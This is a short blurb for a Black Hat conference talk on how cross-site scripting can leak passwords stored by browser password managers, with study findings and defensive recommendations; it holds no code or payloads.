Explore the vulnerabilities of browser-based password managers and their susceptibility to Cross-site Scripting (XSS) attacks in this comprehensive Black Hat conference talk. Learn how XSS can be leveraged to access and leak stored passwords, despite protective measures like HTTPonly Cookies. Examine the current generation of password managers across major browsers, and discover findings from a large-scale study on password field usage in popular websites. Gain valuable insights into attack patterns, security considerations, and receive recommendations for both website operators and users to safeguard against these threats. Delve into topics such as the Same-Origin Policy, types of XSS, HTML5 autocomplete, and proposed solutions to enhance password manager security.